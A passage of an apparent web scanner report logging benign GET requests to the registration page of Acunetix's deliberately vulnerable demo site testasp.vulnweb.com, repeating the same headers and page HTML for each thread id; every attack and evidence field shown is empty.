href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 